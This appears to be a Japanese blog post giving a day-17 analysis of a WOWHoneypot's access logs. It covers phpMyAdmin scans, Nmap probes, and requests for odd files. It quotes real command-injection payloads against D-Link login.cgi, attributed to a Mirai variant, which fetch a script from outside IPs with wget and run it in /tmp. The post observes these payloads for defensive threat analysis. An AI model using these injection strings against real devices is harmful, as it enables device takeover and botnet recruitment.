WOWHoneypot簡易分析(17日目)
WOWhoneypotの2018/6/20(水)(運用17日目)の簡易分析です。
本日の総アクセスログは246件です。
$ awk '/06-20/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
54 [2018-06-20 "GET /
9 [2018-06-20 "HEAD /
5 [2018-06-20 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
4 [2018-06-20 "GET /www/phpMyAdmin/index.php
4 [2018-06-20 "GET /web/phpMyAdmin/index.php
4 [2018-06-20 "GET /typo3/phpmyadmin/index.php
4 [2018-06-20 "GET /tools/phpMyAdmin/index.php
4 [2018-06-20 "GET /pmd/index.php
4 [2018-06-20 "GET /pma-old/index.php
4 [2018-06-20 "GET /pmamy/index.php
4 [2018-06-20 "GET /pmamy2/index.php
4 [2018-06-20 "GET /PMA/index.php
4 [2018-06-20 "GET /pma/index.php
4 [2018-06-20 "GET /PMA2/index.php
4 [2018-06-20 "GET /phpMyAdminold/index.php
4 [2018-06-20 "GET /phpMyAdmin.old/index.php
4 [2018-06-20 "GET /phpmyadmin-old/index.php
4 [2018-06-20 "GET /phpMyAdmin/index.php
4 [2018-06-20 "GET /phpmyadmin/index.php
4 [2018-06-20 "GET /phpMyadmin_bak/index.php
4 [2018-06-20 "GET /phpmyadmin2/index.php
4 [2018-06-20 "GET /phpmyadmin1/index.php
4 [2018-06-20 "GET /phpmyadmin0/index.php
4 [2018-06-20 "GET /phpadmin/index.php
4 [2018-06-20 "GET /mysql/index.php
4 [2018-06-20 "GET /mysqladmin/index.php
4 [2018-06-20 "GET /mysql-admin/index.php
4 [2018-06-20 "GET /myadmin/index.php
4 [2018-06-20 "GET /myadmin2/index.php
4 [2018-06-20 "GET /index.php
4 [2018-06-20 "GET /db/index.php
4 [2018-06-20 "GET /claroline/phpMyAdmin/index.php
4 [2018-06-20 "GET /admin/PMA/index.php
4 [2018-06-20 "GET /admin/pma/index.php
4 [2018-06-20 "GET /admin/phpMyAdmin/index.php
4 [2018-06-20 "GET /admin/phpmyadmin/index.php
4 [2018-06-20 "GET /admin/phpmyadmin2/index.php
4 [2018-06-20 "GET /admin/mysql/index.php
4 [2018-06-20 "GET /admin/mysql2/index.php
4 [2018-06-20 "GET /admin/index.php
3 [2018-06-20 "GET /dbadmin/index.php
2 [2018-06-20 "GET /xampp/phpmyadmin/index.php
2 [2018-06-20 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-20 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-20 "GET /phpma/index.php
2 [2018-06-20 "CONNECT 133.130.126[.]119:43
1 [2018-06-20 "PROPFIND /
1 [2018-06-20 "POST /xx.php
1 [2018-06-20 "POST /xw.php
1 [2018-06-20 "POST /wuwu11.php
1 [2018-06-20 "POST /w.php
1 [2018-06-20 "POST /s.php
1 [2018-06-20 "POST /sheep.php
1 [2018-06-20 "POST /sdk
1 [2018-06-20 "POST /db_session.init.php
1 [2018-06-20 "POST /db.init.php
1 [2018-06-20 "GET /phpmyadmin/scripts/setup.php
1 [2018-06-20 "GET /NmapUpperCheck1529497937
1 [2018-06-20 "GET /nmaplowercheck1529497937
1 [2018-06-20 "GET /Nmap/folder/check1529497937
1 [2018-06-20 "GET /manager/html
1 [2018-06-20 "GET /idman630build10.exe
1 [2018-06-20 "GET /database.rar
例によってPhpMyAdmin関係(160件)や/を除外します。既知のアクセスは青字にします。
5 [2018-06-20 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
2 [2018-06-20 "CONNECT 133.130.126.119:43
1 [2018-06-20 "POST /xx.php
1 [2018-06-20 "POST /xw.php
1 [2018-06-20 "POST /wuwu11.php
1 [2018-06-20 "POST /w.php
1 [2018-06-20 "POST /s.php
1 [2018-06-20 "POST /sheep.php
1 [2018-06-20 "POST /db.init.php
1 [2018-06-20 "POST /db_session.init.php
1 [2018-06-20 "GET /manager/html
1 [2018-06-20 "POST /sdk
1 [2018-06-20 "GET /NmapUpperCheck1529497937
1 [2018-06-20 "GET /nmaplowercheck1529497937
1 [2018-06-20 "GET /Nmap/folder/check1529497937
1 [2018-06-20 "GET /idman630build10.exe
1 [2018-06-20 "GET /database.rar
1.D-Linkの脆弱性を突くMirai亜種shinoa
5 [2018-06-20 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
当初は大量流行するかと思っていましたが、1件→8件→33件→16件→5件→5件と落ち着いています。
なお、うちには来ていませんが、新しく以下のパターンも出ているようです。
/login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6[.]127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$
2.Nmap関連
User-AgentにNmap Scripting Engineと出ているものはNmapというポートスキャン用のツールで80ポートをスキャンした際に残るログです。
POST /sdk HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Content-Length: 441
Connection: close<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
GET /NmapUpperCheck1529497937 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: closeGET /nmaplowercheck1529497937 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: closeGET /Nmap/folder/check1529497937 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
NmapUpperCheckで調べると、以下のサイトが出てきました。
Nmap Development: NSE: http.identify_404 follows redirects
nmap/http.lua at master · nmap/nmap · GitHub
Nmapのスクリプトでわざと存在しないページにアクセスし404ページを表示させる為のスクリプトのようです。
おそらく、404ページの表示の仕方で使っているミドルウェアを判定するためかと思われます。
3. exeファイル、rarファイルへのアクセス
どちらも当然置いてないファイルです。どちらも同一IPからはこの1件のみのアクセスでした。
GET /idman630build10.exe HTTP/1.1
User-Agent: Mozilla/5.0
Connection: close
調査すると、以下のファイルが引っかかりました。
Download Internet Download Manager: high speed download accelerator
GET /database.rar HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
調査すると、以下のファイルが引っかかりました。
/Database.rarをダウンロード - Security System using ANPR - OSDN
どちらも、何故アクセスがあったのか不明なものです。
他でダウンロード可能なものをあえて探しているように見えますが、意図がわからないアクセスです。
本日のハンティングログです。Mirai亜種のみです。
$ awk '/06-20/{print $1,substr($0,index($0,$4))}' hunting.log | sort | uniq -c | sort -nr
5 [2018-06-20 wget hxxp://185.62.190[.]191/r
以上です。